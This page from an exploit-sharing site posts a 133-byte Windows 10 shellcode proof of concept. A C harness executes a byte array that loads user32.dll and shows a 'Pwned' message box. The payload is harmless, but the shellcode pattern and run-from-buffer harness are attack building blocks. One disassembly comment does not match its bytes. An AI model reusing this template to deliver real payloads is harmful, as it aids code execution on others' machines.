facebook facebook twitter rss

Windows10 MessageBox Shellcode - (133 Bytes)

Author: Ghosty , Published: 26-11-2014
/*
▄██████▄ ▄█ █▄ ▄██████▄ ▄████████ ███ ▄██ ▄
███ ███ ███ ███ ███ ███ ███ ███ ▀█████████▄ ███ ██▄
███ █▀ ███ ███ ███ ███ ███ █▀ ▀███▀▀██ ███▄▄▄███
▄███ ▄███▄▄▄▄███▄▄ ███ ███ ███ ███ ▀ ▀▀▀▀▀▀███
▀▀███ ████▄ ▀▀███▀▀▀▀███▀ ███ ███ ▀███████████ ███ ▄██ ███
███ ███ ███ ███ ███ ███ ███ ███ ███ ███
███ ███ ███ ███ ███ ███ ▄█ ███ ███ ███ ███
████████▀ ███ █▀ ▀██████▀ ▄████████▀ ▄████▀ ▀█████▀
###
# Title : Windows10 MessageBox Shellcode - (133 Bytes)
# Author : Ghosty
# E-mail : x31337666@gmail.com
# Home : Hydra (16040) - Algeria -(00551216458)
# Web Site : 127.0.0.1
# FaCeb0ok : http://fb.me/0x9h027
# Friendly Sites : www.exploit4arab.net * www.1337day.com
# Platform/CatID : Shellcode - Local - Win32
# Type : Shellcode - proof of concept - Windows
# Tested on : Windows10 Techincal Preview
###
*/
#include <stdio.h>
#include <string.h>
char msg[] =
"\x31\xc0" // xor %eax,%eax
"\x31\xdb" // xor %ebx,%ebx
"\x31\xc9" // xor %ecx,%ecx
"\x31\xd2" // xor %edx,%edx
"\xeb\x37" // jmp 401041 <_start+0x41>
"\x59" // pop %ecx
"\x88\x51\x0a" // mov %dl,0xa(%ecx)
"\xbb\x30\x0b\xc2\x76" // mov $0x76c20b30,%ebx
"\x51" // push %ecx
"\xff\xd3" // call *%ebx
"\xeb\x39" // jmp 401051 <_start+0x51>
"\x59" // pop %ecx
"\x31\xd2" // xor %edx,%edx
"\x88\x51\x0b" // mov %dl,0xb(%ecx)
"\x51" // push %ecx
"\x50" // push %eax
"\xbb\x30\xf0\xc1\x76" // mov $0x76c1f030,%ebx
"\xff\xd3" // call *%ebx
"\xeb\x39" // jmp 401062 <_start+0x62>
"\x59" // pop %ecx
"\x31\xd2" // xor %edx,%edx
"\x88\x51\x1d" // mov %dl,0x3(%ecx)
"\x31\xd2" // xor %edx,%edx
"\x52" // push %edx
"\x51" // push %ecx
"\x51" // push %ecx
"\x52" // push %edx
"\xff\xd0" // call *%eax
"\x31\xd2" // xor %edx,%edx
"\x50" // push %eax
"\xb8\x80\xdb\xc2\x76" // mov $0x76c2db80,%eax
"\xff\xd0" // call *%eax
"\xe8\xc4\xff\xff\xff" // call 40100a <_start+0xa>
"\x75\x73" // jne 4010bb <__DTOR_LIST__+0x2e>
"\x65" // gs
"\x72\x33" // jb 40107e <_start+0x7e>
"\x32\x2e" // xor (%esi),%ch
"\x64" // fs
"\x6c" // insb (%dx),%es:(%edi)
"\x6c" // insb (%dx),%es:(%edi)
"\x4e" // dec %esi
"\xe8\xc2\xff\xff\xff" // call 401018 <_start+0x18>
"\x4d" // dec %ebp
"\x65" // gs
"\x73\x73" // jae 4010cd <__DTOR_LIST__+0x40>
"\x61" // popa
"\x67" // addr16
"\x65" // gs
"\x42" // inc %edx
"\x6f" // outsl %ds:(%esi),(%dx)
"\x78\x41" // js 4010a2 <__DTOR_LIST__+0x15>
"\x4e" // dec %esi
"\xe8\xc2\xff\xff\xff" // call 401029 <_start+0x29>
"\x59" // pop %ecx
"\x6f" // outsl %ds:(%esi),(%dx)
"\x75\x20" // jne 40108b <__CTOR_LIST__+0x6>
"\x48" // dec %eax
"\x61" // popa
"\x76\x65" // jbe 4010d4 <__DTOR_LIST__+0x47>
"\x20\x42\x65" // and %al,0x65(%edx)
"\x65\x6e" // outsb %gs:(%esi),(%dx)
"\x20\x50\x77" // and %dl,0x77(%eax)
"\x6e" // outsb %ds:(%esi),(%dx)
"\x65\x64\x20\x42\x79" // gs and %al,%fs:%gs:0x79(%edx)
"\x20\x47\x68" // and %al,0x68(%edi)
"\x6f" // outsl %ds:(%esi),(%dx)
"\x73\x74" // jae 4010f7 <__DTOR_LIST__+0x6a>
"\x79\x4e"; // jns 4010d3 <__DTOR_LIST__+0x46>
int main()
{
int (*dz)() = (int(*)())msg;
printf("bytes: %u\n", strlen(msg));
dz();
}
/*================[ ShellCode By Ghosty * 1337dayAlgeria Community * ]=========================================
# Greetz To 1337dayAlgeria Community +> TrOoN, Caddy, KedAnz, Indoushkha, Chevr0sky, Kha&miX, KinG Of PiraTeS
# Greetz To Inj3ct0r Members 31337 +> KedAns * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * Angel Injection
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * All Security and Exploits Webs
#=============================================================================================================*/

Like us on Facebook :